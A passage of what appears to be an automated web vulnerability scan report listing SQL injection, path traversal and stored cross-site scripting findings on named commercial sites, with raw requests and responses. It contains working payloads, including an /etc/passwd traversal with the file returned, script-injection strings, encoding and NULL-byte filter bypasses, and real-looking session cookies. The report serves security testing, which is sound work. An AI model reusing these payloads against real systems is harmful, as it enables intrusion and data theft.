Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; cmResetFlag=N; cmCat=EXTERNAL|G1_D6B_70676; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&DateShopperIdAssigned=02%2F25%2F2011&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 1

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 04:55:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:35 GMT
Connection: close
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /jcp%2527%2527/JCPRoute.aspx?Target=PREPRINT_HOME&cmResetCat=True&CmCatId=70676&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105704 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; cmResetFlag=N; cmCat=EXTERNAL|G1_D6B_70676; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&DateShopperIdAssigned=02%2F25%2F2011&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 04:55:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37

<html><body>Bad Request</body></html>

1.30. http://www4.jcpenney.com/jcp/freeship4u.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/freeship4u.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /jcp%2527/freeship4u.aspx?refpagename=X2%252Easpx&refdeptid=70676&refcatid=70676&cmAMS_T=X2&cmAMS_C=BANNER&cmAMS_V=X2V1&CmCatId=70676 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02/25/2011&ShopperType=XGN255; IsFirstTime=; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 1

HTTP/1.1 404 Not Found
ntCoent-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
nnCoection: close
Expires: Sat, 26 Feb 2011 04:55:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

Request 2

GET /jcp%2527%2527/freeship4u.aspx?refpagename=X2%252Easpx&refdeptid=70676&refcatid=70676&cmAMS_T=X2&cmAMS_C=BANNER&cmAMS_V=X2V1&CmCatId=70676 HTTP/1.1
Host: www4.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02/25/2011&ShopperType=XGN255; IsFirstTime=; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; FlashCheck=1

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 26 Feb 2011 04:55:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 04:55:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 37

<html><body>Bad Request</body></html>

1.31. http://www5.jcpenney.com/jcp/x6xml.aspx [grptyp parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www5.jcpenney.com
Path:   /jcp/x6xml.aspx

Issue detail

The grptyp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the grptyp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY'&itemid=1a6ddad&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Location: /jcp/UserError.aspx?exception=000
Pragma: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:39 GMT
Date: Sat, 26 Feb 2011 04:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fjcp%2fUserError.aspx%3fexception%3d000">here</a>.</h2>
</body></html>

Request 2

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY''&itemid=1a6ddad&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Pragma: no-cache
Content-Length: 0
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:40 GMT
Date: Sat, 26 Feb 2011 04:58:40 GMT
Connection: close


1.32. http://www5.jcpenney.com/jcp/x6xml.aspx [itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www5.jcpenney.com
Path:   /jcp/x6xml.aspx

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY&itemid=1a6ddad'&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Location: /jcp/UserError.aspx?exception=000
Pragma: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:42 GMT
Date: Sat, 26 Feb 2011 04:58:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fjcp%2fUserError.aspx%3fexception%3d000">here</a>.</h2>
</body></html>

Request 2

GET /jcp/x6xml.aspx?deptid=70750&catid=72384&grptyp=STY&itemid=1a6ddad''&steps=LOT|7211400&cmcatid=homepage|72384 HTTP/1.1
Host: www5.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage%7c72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; cmResetFlag=N; cmCat=EXTERNAL|ENS; ItemCount=0; ItemTotal=.00; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q; cmProdAtt=1A6DDBD=-_--_--_--_--_--_--_--_--_-; DomainItemCount=0; DomainItemTotal=$0.00; invodoViewer=Aco6Et4bstEd09EYRM1YaeDbCSzMjBFM5Yf65vY20vUY; invodoVisitor=CZoyWu30uu7XbG7RNWuRoh; HistCheck=1

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Pragma: no-cache
Content-Length: 0
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sat, 26 Feb 2011 04:58:44 GMT
Date: Sat, 26 Feb 2011 04:58:44 GMT
Connection: close


2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJ../../../../../../../../etc/passwd%00viewAdJ was submitted in the mName parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJ../../../../../../../../etc/passwd%00viewAdJ HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; __utmb=234602824; qcsegs=D,T

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Thu, 21 Apr 2011 01:25:48 GMT
Content-Length: 2011
Connection: close

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. Cross-site scripting (stored)  previous  next
There are 6 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.reputation.com/itemAdded [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /itemAdded

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /itemAdded. The payload fdf63"><script>alert(1)</script>80868d6c85b was submitted in the entityId parameter. This input was returned unmodified in a subsequent request for the URL /itemAdded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=fdf63"><script>alert(1)</script>80868d6c85b HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Request 2

GET /itemAdded?bundleAdded=1862 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; __utmv=; repdef_ref_code=RCPT2; _bizo_cksm_crc32=18E06BDE; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.10.7.1303227203968

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:55:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:55:51 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 570411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<select name="switchPlan[fdf63"><script>alert(1)</script>80868d6c85b][3594]" id="promoscaleSelect_3594" entityId="fdf63">
...[SNIP]...

3.2. http://www.reputation.com/itemAdded [entityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /itemAdded

Issue detail

The value of the entityId request parameter submitted to the URL /services/ajax_updateShoppingCart.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /itemAdded. The payload af3ef"><script>alert(1)</script>03fec696ae4 was submitted in the entityId parameter. This input was returned unmodified in a subsequent request for the URL /itemAdded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /services/ajax_updateShoppingCart.php?method=addBundle&planId=1862&entityId=af3ef"><script>alert(1)</script>03fec696ae4 HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/myprivacy-myreputation-bundle
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
